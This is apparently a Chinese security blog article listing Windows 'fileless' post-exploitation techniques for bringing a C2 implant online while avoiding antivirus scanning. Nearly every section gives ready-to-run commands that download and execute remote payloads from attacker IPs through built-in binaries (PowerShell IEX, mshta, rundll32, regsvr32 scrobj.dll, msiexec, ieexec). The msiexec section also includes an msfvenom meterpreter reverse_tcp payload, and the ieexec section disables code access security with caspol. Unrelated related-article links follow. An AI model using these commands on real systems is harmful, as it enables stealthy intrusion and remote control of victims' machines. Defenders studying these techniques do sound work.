后渗透之windows中无文件落地执行方法

简介: 后渗透之windows中无文件落地执行方法

前言


在我们渗透过程中,当getshell或者能够执行命令后需要上线C2时,一般是执行下载(或上传)将文件写入目标服务器后执行。这种方式会留下一个二进制文件可能会被扫描查杀。

而通过一些系统或组件自带命令进行文件不落地执行,这种方式不会留下二进制文件,更具有隐蔽性。本文将列举一些文件不落地的命令方法。


powershell


在win7/2008开始引入的一种跨平台的任务自动化解决方案,由命令行 shell、
脚本语言和配置管理框架组成。
powershell功能十分强大。一行命令即可直接执行远程文件。
文件路径:

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

支持系统: >= win7/win2008

用法:


powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx/test.ps1'))"


1331a8644e20c0124a3acd7164be0cd6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


mshta


mshta.exe是Windows操作系统内置程序,用于执行.hta文件(HTML应用程序)

文件路径:

  • C:\Windows\System32\mshta.exe

支持系统: win7-win11

用法:

vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) 
mshta http://webserver/payload.hta 
/cmd /c mshta.exe javascript:a(GetObject("script:http://1.1.1.1/m.sct")).Exec();close();

61b08136ce198dd1d266c67256c1d025_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


rundll32


Rundll32.exe是win系统非常重要的核心程序。它的作用是执行DLL文件,在命令行下调用动态链接程序库。
系统中还有一个Rundll64.exe文件,它的意思是"执行64位的DLL文件",这两个是病毒软件制作者的最爱,也是在以往病毒分析报告中出现最多的应用媒介

文件路径:

  • C:\Windows\System32\rundll32.exe

支持系统: win7 -win11

用法:

远程加载:
C:\Windows\SysWOW64\rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:http://192.168.1.4/Rundll32_shellcode"

执行远程文件

ea562c72b8e7514994f2dcde15bbdddb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


Regsvr32


Regsvr32是用于注册COM组件,Windows 命令行下提供的注册控件或者卸载控件的命令

文件路径:

  • C:\Windows\System32\Regsvr32.exe

支持系统: win7 -win11

用法:


regsvr32 /u /n /s /i:http://192.168.173.45:8800/file.sct scrobj.dll


4a6b71e2767bd0b0393459dce7460ea5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


Msiexec.exe


win核心应用,用于安装msi包。是Windows Installer的一部分。

文件路径:

  • C:\Windows\System32\msiexec.exe

支持系统: win7 -win11

用法:


msiexec.exe /q /i http://192.168.173.45/test.msi

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.14.1 -f msi > test.msi 
msiexec.exe /q /i http://192.168.173.45/test.msi


4afcc1aa6d5c8468d17477bd84ca091f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


IEexec


IEexec.exe是.NET Framework附带程序,.NET框架在win系统自带。
而同目录下的Csc.exe就是C#的语言编译器
文件路径:

  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe

支持系统: win7 -win11

用法:

cd C:\Windows\Microsoft.NET\Framework64\v2.0.50727 
caspol -s off 
ieexec http://ip:8080/test.exe


总结


这里只列举了一些常用不落地执行方法,当然还有很多方法比如利用特定版本中组件的方法。使用这些方法需要满足出网条件,实战中还是需要开阔思路,找到现有场景中的缺陷才能bypass


相关文章
|
4月前
|
XML C# 数据格式
掌握了在Windows平台上查看DLL依赖的方法
掌握了在Windows平台上查看DLL依赖的方法
531 4
|
2月前
|
存储 缓存 安全
硬盘数据恢复:恢复硬盘数据的9个实用方法(Windows版)
无论是工作文档、家庭照片,还是其他珍贵的数字资产,数据丢失总是一件让人头疼的事情。然而,当硬盘发生问题时,不必过于慌张——只要正确应对,许多数据都可以被成功恢复。本文将从常见数据丢失原因到具体恢复方法,为您提供全面的硬盘数据恢复指导。
|
4月前
|
人工智能 JavaScript 网络安全
ToB项目身份认证AD集成(三完):利用ldap.js实现与windows AD对接实现用户搜索、认证、密码修改等功能 - 以及针对中文转义问题的补丁方法
本文详细介绍了如何使用 `ldapjs` 库在 Node.js 中实现与 Windows AD 的交互,包括用户搜索、身份验证、密码修改和重置等功能。通过创建 `LdapService` 类,提供了与 AD 服务器通信的完整解决方案,同时解决了中文字段在 LDAP 操作中被转义的问题。
110 1
|
4月前
|
存储 开发框架 .NET
Windows IIS中asp的global.asa全局配置文件使用说明
Windows IIS中asp的global.asa全局配置文件使用说明
73 1
|
4月前
|
Java Windows
如何在windows上运行jar包/JAR文件 如何在cmd上运行 jar包 保姆级教程 超详细
本文提供了一个详细的教程,解释了如何在Windows操作系统的命令提示符(cmd)中运行JAR文件。
1676 1
|
4月前
|
弹性计算 数据安全/隐私保护 Windows
阿里云国际版无法远程连接Windows服务器的排查方法
阿里云国际版无法远程连接Windows服务器的排查方法
|
4月前
|
安全 Windows
Windows系统实现exe服务注册的方法都有哪些?
【10月更文挑战第5天】Windows系统实现exe服务注册的方法都有哪些?
779 0
|
4月前
|
数据可视化 程序员 C#
C#中windows应用窗体程序的输入输出方法实例
C#中windows应用窗体程序的输入输出方法实例
78 0
|
4月前
|
网络协议 安全 调度
关闭Windows自动更新的6种方法
本文介绍了六种关闭Windows自动更新的方法,包括使用服务管理器、组策略编辑器、修改注册表、任务计划程序、网络连接设置和命令行。
2209 0
|
4月前
|
程序员 Windows
程序员必备文件搜索工具 Everything 带安装包!!! 比windows自带的文件搜索快几百倍!!! 超级好用的文件搜索工具,仅几兆,不占内存,打开即用
文章推荐了程序员必备的文件搜索工具Everything,并提供了安装包下载链接,强调其比Windows自带搜索快且占用内存少。
86 0